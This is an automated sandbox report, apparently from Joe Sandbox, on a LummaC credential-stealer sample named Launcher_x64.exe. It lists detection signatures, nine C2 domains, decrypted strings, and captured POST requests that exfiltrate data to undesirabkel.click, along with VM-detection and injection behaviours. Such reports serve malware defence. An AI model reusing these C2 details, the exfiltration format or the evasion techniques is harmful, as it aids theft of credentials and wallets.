Edit tour

Windows Analysis Report
Launcher_x64.exe

Overview

General Information

Sample name:	Launcher_x64.exe
Analysis ID:	1582871
MD5:	741ee77540764d0c3eab3f6fa16f5f37
SHA1:	89db0aca9e9db4cec292b77c9592e8f10626ed11
SHA256:	fdfa752ff15ceefd4337704a2f52116dc44d18f7aa2ecb775ad0540dbc3990b2
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Launcher_x64.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: 741EE77540764D0C3EAB3F6FA16F5F37)

conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Launcher_x64.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: 741EE77540764D0C3EAB3F6FA16F5F37)

Launcher_x64.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: 741EE77540764D0C3EAB3F6FA16F5F37)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rabidcowse.shop", "undesirabkel.click", "tirepublicerj.shop", "cloudewahsj.shop", "noisycuttej.shop", "wholersorie.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop"], "Build id": "LPnhqo--swetamubcoyu"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Launcher_x64.exe PID: 7372	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Launcher_x64.exe PID: 7372	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Launcher_x64.exe PID: 7372	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Launcher_x64.exe PID: 7372	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:37:10.285247+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	188.114.97.3	443	TCP
2024-12-31T17:37:11.424848+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	188.114.97.3	443	TCP
2024-12-31T17:37:12.697496+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	188.114.97.3	443	TCP
2024-12-31T17:37:16.980147+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	188.114.97.3	443	TCP
2024-12-31T17:37:18.395431+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	188.114.97.3	443	TCP
2024-12-31T17:37:22.852054+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	188.114.97.3	443	TCP
2024-12-31T17:37:26.331153+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	188.114.97.3	443	TCP
2024-12-31T17:37:29.118021+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:37:10.758421+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	188.114.97.3	443	TCP
2024-12-31T17:37:11.867229+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	188.114.97.3	443	TCP
2024-12-31T17:37:29.896418+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49742	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:37:10.758421+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:37:11.867229+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:37:10.285247+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	188.114.97.3	443	TCP
2024-12-31T17:37:11.424848+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	188.114.97.3	443	TCP
2024-12-31T17:37:12.697496+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	188.114.97.3	443	TCP
2024-12-31T17:37:16.980147+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	188.114.97.3	443	TCP
2024-12-31T17:37:18.395431+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	188.114.97.3	443	TCP
2024-12-31T17:37:22.852054+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	188.114.97.3	443	TCP
2024-12-31T17:37:26.331153+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	188.114.97.3	443	TCP
2024-12-31T17:37:29.118021+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:37:09.693251+0100	2058550	1	Domain Observed Used for C2 Detected	192.168.2.4	56056	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:37:16.450237+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49732	188.114.97.3	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:37:26.361006+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49736	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://undesirabkel.click/f?	Avira URL Cloud: Label: malware
Source: undesirabkel.click	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apis0	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/.?	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click:443/api	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/((j	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/A	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/api	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apite	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apiH	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/apiw	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/4	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["rabidcowse.shop", "undesirabkel.click", "tirepublicerj.shop", "cloudewahsj.shop", "noisycuttej.shop", "wholersorie.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop"], "Build id": "LPnhqo--swetamubcoyu"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 85.8% probability

Machine Learning detection for sample

Source: Launcher_x64.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: undesirabkel.click
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2901764037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--swetamubcoyu

Source: Launcher_x64.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 0_2_00D7B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00D7B799
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D7B6E8 FindFirstFileExW,	2_2_00D7B6E8
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: 2_2_00D7B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00D7B799

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.4:56056 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49736 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: undesirabkel.click
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: framekgirus.shop

Source: global traffic

TCP traffic: 192.168.2.4:65531 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GHSI1GIXNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18116Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=98XA9EBX2WNXENO8FY8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8797Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D1YXNTJVU2NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0OT5R9Y34Z1ZACQ1LYYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1270Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NTCS7LIP3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584103Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: undesirabkel.click

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: undesirabkel.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click

Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
